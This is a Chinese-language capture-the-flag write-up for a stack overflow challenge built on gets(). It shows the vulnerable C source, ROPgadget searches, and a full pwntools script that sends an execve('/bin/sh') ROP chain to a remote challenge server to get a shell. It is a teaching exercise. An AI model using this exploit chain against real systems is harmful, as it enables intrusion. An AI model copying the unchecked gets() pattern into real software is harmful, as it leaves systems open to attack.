原始碼
#include <stdio.h>
// gcc chal.c -o chal -fno-stack-protector -no-pie --static
void init_IOBUF(){
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
}
int main(){
init_IOBUF();
char buffer[8];
printf("Go!!!! ");
gets(buffer);
return 0;
}
解題
解題思路
使用ROP的方法獲得shell,繞過NX保護
確認保護機制
checksec --file=chal

尋找需要的資訊
尋找pop rax ret
ROPgadget --binary chal --only "pop|ret"|grep rax

0x000000000044fec7 : pop rax ; ret
尋找pop rdi ret
ROPgadget --binary chal --only "pop|ret"|grep rdi

0x0000000000401edf : pop rdi ; ret
尋找pop rsi ret
ROPgadget --binary chal --only "pop|ret"|grep rsi

0x0000000000409f4e : pop rsi ; ret
尋找pop rdx ret
ROPgadget --binary chal --only "pop|ret"|grep rdx

0x0000000000485c2b : pop rdx ; pop rbx ; ret
尋找mov qword rax rsi
ROPgadget --binary chal |grep "mov qword"|grep rax|grep rsi

0x0000000000452635 : mov qword ptr [rsi], rax ; ret
尋找可寫的位置(bss)
gdb ./chal
b main
run
vmmap

0x4c5000: 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
尋找syscall
ROPgadget --binary chal --only "syscall"

0x0000000000401c94 : syscall
計算要overflow大小
0xde98-0xde88=0x10

編寫payload
pop_rsi=0x409f4e
pop_rax=0x44fec7
pop_rdi=0x401edf
pop_rdx_rbx=0x485c2b
mov_qword_rsi_rax=0x452635
syscall=0x401c94
bss=0x4c5000
p=flat(
b'a'*0x10,
pop_rsi,bss,
pop_rax,b"/bin/sh\0",
mov_qword_rsi_rax,
pop_rdi,bss,
pop_rsi,0,
pop_rdx_rbx,0,0,
pop_rax,0x3b,
syscall
)
實際payload
from pwn import *
context.arch = 'amd64'
host='66.235.110.67'
port=20003
r=remote(host,port)
"""
0x0000000000401edf : pop rdi ; ret
0x0000000000409f4e : pop rsi ; ret
0x0000000000485c2b : pop rdx ; pop rbx ; ret
0x0000000000452635 : mov qword ptr [rsi], rax ; ret
0x000000000044fec7 : pop rax ; ret
0x0000000000401c94 : syscall
"""
pop_rdi=0x401edf
pop_rsi=0x409f4e
pop_rdx_rbx=0x485c2b
bss=0x4c5000
mov_rsi_rax=0x452635
pop_rax=0x44fec7
syscall=0x401c94
cmd=b'/bin/sh\0'
p=flat(
b'a'*0x10,
pop_rsi,bss,
pop_rax,cmd,
mov_rsi_rax,
pop_rdi,bss,
pop_rsi,0x0,
pop_rdx_rbx,0x0,0x0,
pop_rax,0x3b,
syscall,
)
r.sendline(p)
r.interactive()
flag



說些什麼吧!